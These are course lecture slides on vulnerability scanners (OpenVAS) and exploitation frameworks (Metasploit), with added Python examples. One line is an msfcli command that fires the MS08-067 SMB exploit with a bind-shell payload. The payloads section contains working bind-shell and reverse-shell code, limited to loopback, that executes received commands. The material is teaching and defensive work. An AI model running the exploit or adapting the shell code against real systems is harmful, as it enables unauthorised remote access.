CIT 480: Securing Computer Systems Vulnerability Scanning and Exploitation Frameworks
Vulnerability Scanners
Vulnerability scanners are automated tools that scan hosts and networks for potential vulnerabilities, including:
- Configuration errors
- Known unpatched vulnerabilities
Vulnerability Databases
Advantages
- Vulnerability scanners can identify thousands of potential security issues
  - automatically and quickly
  - on a regular basis, to catch systems that have become vulnerable since the last scan (new CVEs, drifted configuration, newly added hosts)
- Can identify problems that administrators missed or misconfigured
- Lets the security team know where problems exist
- Essential part of defense in depth
Drawbacks
- Results are only as good as the vulnerability database
  - must keep the vulnerability db up to date
- Some reported vulnerabilities are false positives
  - a common cause is version-banner checks: the distribution backported the fix without changing the version string the scanner sees
  - must check for the existence of the actual vulnerability
  - configure the scanner to ignore confirmed false positives in future scans, and record why, so the exception can be reviewed later
- Human attackers are more capable than a scanner
  - can use zero-day vulnerabilities that are not in the db
  - can find misconfigurations, or chain individually minor problems into an exploitable path, that the scanner cannot find
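The false-positive handling described above, as an added example that is not part of the lecture or of OpenVAS: a small triage script that parses a scanner report, drops findings on a documented suppression list, and ranks the rest for manual verification. The XML is a constructed sample loosely shaped like an OpenVAS result record (the element names, hosts and NVT OIDs are assumptions of this example, not real OpenVAS checks).

```python
"""Triage scanner findings: suppress confirmed false positives, rank the rest."""
import xml.etree.ElementTree as ET
from dataclasses import dataclass

# Constructed sample report. Element names imitate a simplified OpenVAS result
# record; real reports carry many more fields. OIDs and hosts are made up.
SAMPLE_REPORT = """<report>
<results>
  <result id="r1">
    <host>192.168.56.101</host><port>445/tcp</port>
    <nvt oid="1.3.6.1.4.1.25623.1.0.100001"><name>SMB remote code execution (MS08-067)</name><cvss_base>10.0</cvss_base></nvt>
    <threat>High</threat>
  </result>
  <result id="r2">
    <host>192.168.56.102</host><port>22/tcp</port>
    <nvt oid="1.3.6.1.4.1.25623.1.0.100002"><name>OpenSSH version out of date</name><cvss_base>7.5</cvss_base></nvt>
    <threat>High</threat>
  </result>
  <result id="r3">
    <host>192.168.56.102</host><port>80/tcp</port>
    <nvt oid="1.3.6.1.4.1.25623.1.0.100003"><name>Web server version disclosure</name><cvss_base>2.6</cvss_base></nvt>
    <threat>Low</threat>
  </result>
  <result id="r4">
    <host>192.168.56.103</host><port>22/tcp</port>
    <nvt oid="1.3.6.1.4.1.25623.1.0.100002"><name>OpenSSH version out of date</name><cvss_base>7.5</cvss_base></nvt>
    <threat>High</threat>
  </result>
</results>
</report>"""


@dataclass(frozen=True)
class Finding:
    host: str
    port: str
    oid: str      # identifier of the check that fired
    name: str
    cvss: float
    threat: str

    @property
    def key(self):
        # Suppression is keyed per host+port+check, never per check alone.
        return (self.host, self.port, self.oid)


def parse_report(xml_text):
    """Parse the simplified report into Finding objects.

    Scanner output is data that came off the network; for reports you did not
    generate yourself, parse with defusedxml instead of plain ElementTree.
    """
    root = ET.fromstring(xml_text)
    findings = []
    for r in root.iter("result"):
        nvt = r.find("nvt")
        findings.append(Finding(
            host=r.findtext("host").strip(),
            port=r.findtext("port").strip(),
            oid=nvt.get("oid"),
            name=nvt.findtext("name").strip(),
            cvss=float(nvt.findtext("cvss_base")),
            threat=r.findtext("threat").strip(),
        ))
    return findings


# Confirmed false positives. Each entry records the evidence, so the exception
# can be re-checked, and applies to exactly one host/port/check combination so
# it never hides the same finding on a different machine (r4 stays reported).
KNOWN_FALSE_POSITIVES = {
    ("192.168.56.102", "22/tcp", "1.3.6.1.4.1.25623.1.0.100002"):
        "banner check only; distro backported the fix (verified via package changelog)",
}


def triage(findings, suppressed=KNOWN_FALSE_POSITIVES, min_cvss=4.0):
    """Return (findings to verify by hand, sorted by severity; suppressed findings)."""
    to_verify, dropped = [], []
    for f in findings:
        if f.key in suppressed:
            dropped.append((f, suppressed[f.key]))
        elif f.cvss >= min_cvss:
            to_verify.append(f)
    to_verify.sort(key=lambda f: (-f.cvss, f.host))
    return to_verify, dropped


if __name__ == "__main__":
    verify, dropped = triage(parse_report(SAMPLE_REPORT))
    for f in verify:
        print(f"VERIFY  {f.cvss:4.1f} {f.host}:{f.port} {f.name}")
    for f, why in dropped:
        print(f"SKIPPED {f.host}:{f.port} {f.name} [{why}]")
```

The list handed to the verification step is what an exploitation framework (next section) is then pointed at; anything confirmed there is a real vulnerability, anything that fails verification is a candidate for the suppression list, with its reason.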
Vulnerability Scanners
OpenVAS Architecture
OpenVAS In-progress Scans
OpenVAS Vulnerability Report
Exploitation Frameworks
Exploitation frameworks allow users to:
- Choose and configure an exploit from a database of exploits
- Launch exploits on specified targets to verify whether a vulnerability is present or not
Useful for:
- Verifying vulnerability scanner results
- Performing penetration tests
- Convincing management that a problem exists
Exploitation Frameworks
Metasploit Architecture
Metasploit Interfaces
- msfconsole: interactive command line interface
- msfcli: non-interactive command line interface, e.g.
  msfcli windows/smb/ms08_067_netapi RHOST=192.168.56.101 PAYLOAD=windows/shell/bind_tcp E
  The trailing mode letter selects the action (E executes the exploit, C runs the module's check, O lists its options); without it msfcli only prints help.
  Note: msfcli was removed from Metasploit in 2015. The same one-liner is now run with msfconsole -x followed by the console commands, or from a resource script with msfconsole -r.
- Armitage: interactive graphical interface
Exploit Configuration
1. OS and application version: the matching variant (target) of the exploit may need to be chosen, because return addresses and offsets differ between versions, service packs and language packs
2. Target selection: IP address and port
3. Payload selection: select the shellcode type, e.g. a shell or remote desktop; the payload must fit the space the exploit provides
4. Encoding: encoders rewrite the payload to avoid bad characters the vulnerable input cannot carry and to change its byte signature, which at the time defeated signature-based IPS and AV; the standard encoders are now widely signatured themselves, so encoding alone is not a reliable evasion
Payloads
- Bind shell: opens a port on the exploited host offering a shell with no password required; blocked by inbound firewalls and NAT in front of the target, and anyone who can reach the port gets the shell
- Reverse shell: target makes a connection back to a listening port on one of your servers, offering a shell; passes most firewalls that allow outbound connections
- Remote desktop: remote desktop using RDP, VNC, NX, or X
- Meterpreter: advanced in-memory payload with post-exploitation modules, including key logging, sniffing, hash dumping, etc.
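The difference between the first two payload types is the direction of the connection. As an added example (not code from the lecture or from Metasploit), the two functions below play both sides of each payload over loopback: the "victim" side executes commands it receives and the "attacker" side drives it. Port numbers are chosen by the OS and all traffic stays on 127.0.0.1; the command-execution loop is the example's own stand-in for a real shell payload.

```python
"""Bind shell vs reverse shell, both sides run locally for demonstration."""
import socket
import subprocess
import threading

END = b"\n__END__\n"   # marker the victim appends so the attacker knows output is complete


def _serve_commands(conn):
    """Victim side: read one command per line, run it, send back its output.

    This is exactly the 'shell with no password required' property from the
    slide: whoever holds the socket runs commands. Never bind it off-loopback.
    """
    with conn:
        for line in conn.makefile("rb"):
            cmd = line.decode().strip()
            if cmd == "exit":
                break
            out = subprocess.run(cmd, shell=True, capture_output=True, timeout=5)
            conn.sendall(out.stdout + out.stderr + END)


def _run_remote(sock, cmd):
    """Attacker side: send one command and collect its output up to the marker."""
    sock.sendall(cmd.encode() + b"\n")
    buf = b""
    while not buf.endswith(END):
        chunk = sock.recv(4096)
        if not chunk:
            break
        buf += chunk
    return buf[:-len(END)].decode() if buf.endswith(END) else buf.decode()


def bind_shell_demo(cmd="echo bind-ok"):
    """Bind shell: the exploited host listens, the attacker connects in.
    An inbound firewall or NAT on the victim's side stops this step."""
    victim = socket.socket()
    victim.bind(("127.0.0.1", 0))        # port 0: let the OS pick a free port
    victim.listen(1)
    port = victim.getsockname()[1]

    def payload():                       # what the exploit would run on the victim
        conn, _ = victim.accept()
        _serve_commands(conn)

    t = threading.Thread(target=payload, daemon=True)
    t.start()
    with socket.create_connection(("127.0.0.1", port)) as attacker:
        result = _run_remote(attacker, cmd)
        attacker.sendall(b"exit\n")
    t.join(5)
    victim.close()
    return result.strip()


def reverse_shell_demo(cmd="echo reverse-ok"):
    """Reverse shell: the attacker listens (Metasploit's LHOST/LPORT), the
    exploited host connects out, which most outbound-permissive firewalls allow."""
    handler = socket.socket()
    handler.bind(("127.0.0.1", 0))
    handler.listen(1)
    lhost, lport = handler.getsockname()

    def payload():                       # victim: connect back, then serve commands
        with socket.create_connection((lhost, lport)) as conn:
            _serve_commands(conn)

    t = threading.Thread(target=payload, daemon=True)
    t.start()
    conn, _ = handler.accept()
    with conn:
        result = _run_remote(conn, cmd)
        conn.sendall(b"exit\n")
    t.join(5)
    handler.close()
    return result.strip()


if __name__ == "__main__":
    print("bind shell   ->", bind_shell_demo())
    print("reverse shell ->", reverse_shell_demo())
```

In the bind case the listening socket lives on the victim, so the defender's perimeter sees an unexpected inbound connection to a new port; in the reverse case it sees an outbound connection from a server that normally makes none, which is the event a detection team should be alerting on.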
Key Points
Vulnerability scanners
- Automatically scan the network to find vulnerabilities based on a vulnerability database
- Results are only as good as the vulnerability database
- Human attackers are better than scanners, so a clean scan doesn't indicate perfect security
Exploitation frameworks
- Verify vulnerability scanner results
- Assist in penetration testing
Released under CC BY-SA 3.0
This presentation is released under the Creative Commons Attribution-ShareAlike 3.0 Unported (CC BY-SA 3.0) license.
You are free:
- to Share: to copy and redistribute the material in any medium
- to Adapt: to remix, transform, and build upon the material
- to use part or all of this presentation in your own classes
Under the following conditions:
- Attribution: you must attribute the work to James Walden, but not in a way that suggests that he endorses you or your use of these materials.
- Share Alike: if you remix, transform, or build upon this material, you must distribute the resulting work under this or a similar open license.
Details and full text of the license can be found at https://creativecommons.org/licenses/by-nc-sa/3.0/